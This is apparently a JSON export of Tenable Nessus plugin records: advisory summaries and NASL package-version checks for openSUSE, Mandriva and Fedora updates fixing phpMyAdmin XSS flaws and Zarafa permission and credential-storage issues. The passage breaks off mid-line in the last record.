{"nessus": [{"lastseen": "2018-09-02T00:04:23", "references": ["http://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html", "https://bugzilla.novell.com/show_bug.cgi?id=892401", "https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_14/ChangeLog"], "pluginID": "77432", "description": "This phpMyAdmin update addresses several security and non security issues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query charts	(CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273) (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table name (triggers)(CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped db/table name in navigation hiding (CVE-2014-4349) (From 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_ 14/ChangeLog", "edition": 4, "reporter": "Tenable", "published": "2014-08-29T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4349", "CVE-2014-5273", "CVE-2014-4987", "CVE-2014-5274"], "modified": "2014-08-29T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "OPENSUSE-2014-518.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77432", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-518.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77432);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/08/29 14:08:53 $\");\n\n script_cve_id(\"CVE-2014-4349\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-5273\", \"CVE-2014-5274\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)\");\n script_summary(english:\"Check for the openSUSE-2014-518 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This phpMyAdmin update addresses several security and non security\nissues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From\n 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page\n (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor\n (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page\n (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query\n charts	(CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273)\n (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table\n name (triggers)(CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages\n (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User\n groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped\n db/table name in navigation hiding (CVE-2014-4349) (From\n 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at\n https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_\n 14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.3-1.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.3-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:00:54", "references": ["http://advisories.mageia.org/MGASA-2014-0380.html"], "pluginID": "77839", "description": "Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session information, including login credentials, on-disk in PHP session files. This session file would contain a user's username and password to the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448, CVE-2014-5449, CVE-2014-5450).", "edition": 5, "reporter": "Tenable", "published": "2014-09-25T00:00:00", "title": "Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:zarafa-dagent", "p-cpe:/a:mandriva:linux:zarafa-common", "p-cpe:/a:mandriva:linux:zarafa-ical", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:zarafa-indexer", "p-cpe:/a:mandriva:linux:zarafa-server", "p-cpe:/a:mandriva:linux:zarafa-client", "p-cpe:/a:mandriva:linux:lib64zarafa-devel", "p-cpe:/a:mandriva:linux:zarafa-spooler", "p-cpe:/a:mandriva:linux:zarafa-monitor", "p-cpe:/a:mandriva:linux:python-MAPI", "p-cpe:/a:mandriva:linux:zarafa", "p-cpe:/a:mandriva:linux:lib64zarafa0", "p-cpe:/a:mandriva:linux:zarafa-archiver", "p-cpe:/a:mandriva:linux:zarafa-webaccess", "p-cpe:/a:mandriva:linux:php-mapi", "p-cpe:/a:mandriva:linux:zarafa-gateway", "p-cpe:/a:mandriva:linux:zarafa-caldav", "p-cpe:/a:mandriva:linux:zarafa-utils"], "id": "MANDRIVA_MDVSA-2014-182.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77839", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:182. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77839);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-0103\", \"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(68247, 69362, 69365, 69369, 69370);\n script_xref(name:\"MDVSA\", value:\"2014:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session\ninformation, including login credentials, on-disk in PHP session\nfiles. This session file would contain a user's username and password\nto the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has\nmultiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\nCVE-2014-5449, CVE-2014-5450).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0380.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-MAPI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-archiver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-caldav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-dagent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-ical\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-indexer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-spooler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-webaccess\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64zarafa-devel-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64zarafa0-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"php-mapi-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-MAPI-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-archiver-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-caldav-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-client-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-common-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-dagent-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-gateway-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-ical-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-indexer-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-monitor-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-server-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-spooler-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-utils-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"zarafa-webaccess-7.1.8-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T02:02:54", "references": ["http://www.nessus.org/u?eb328207", "https://bugzilla.redhat.com/show_bug.cgi?id=1133439"], "pluginID": "77450", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2014-08-30T00:00:00", "title": "Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2018-09-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:zarafa"], "id": "FEDORA_2014-9754.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77450", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9754.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77450);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/09/05 12:31:21\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9754\");\n\n script_name(english:\"Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb328207\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"zarafa-7.1.10-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:00:05", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php", "http://sourceforge.net/p/phpmyadmin/news/", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php"], "pluginID": "76924", "description": "Multiple vulnerabilities has been discovered and corrected in phpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the PMA_getHtmlForActionLinks function in libraries/structure.lib.php in phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted table comment that is improperly handled during construction of a database structure page (CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted trigger name that is improperly handled on the database triggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message (CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address these vulnerabilities.", "edition": 5, "reporter": "Tenable", "published": "2014-07-31T00:00:00", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:phpmyadmin"], "id": "MANDRIVA_MDVSA-2014-143.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76924", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:143. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76924);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n script_bugtraq_id(68798, 68799, 68803, 68804);\n script_xref(name:\"MDVSA\", value:\"2014:143\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\nphpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the\nPMA_getHtmlForActionLinks function in libraries/structure.lib.php in\nphpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\ninject arbitrary web script or HTML via a crafted table comment that\nis improperly handled during construction of a database structure page\n(CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\nfunction in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\n4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\nauthenticated users to inject arbitrary web script or HTML via a\ncrafted trigger name that is improperly handled on the database\ntriggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js\nin phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\nbefore 4.2.6 allow remote authenticated users to inject arbitrary web\nscript or HTML via a crafted (1) table name or (2) column name that is\nimproperly handled during construction of an AJAX confirmation message\n(CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\nbefore 4.2.6 allows remote authenticated users to bypass intended\naccess restrictions and read the MySQL user list via a viewUsers\nrequest (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address\nthese vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://sourceforge.net/p/phpmyadmin/news/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu 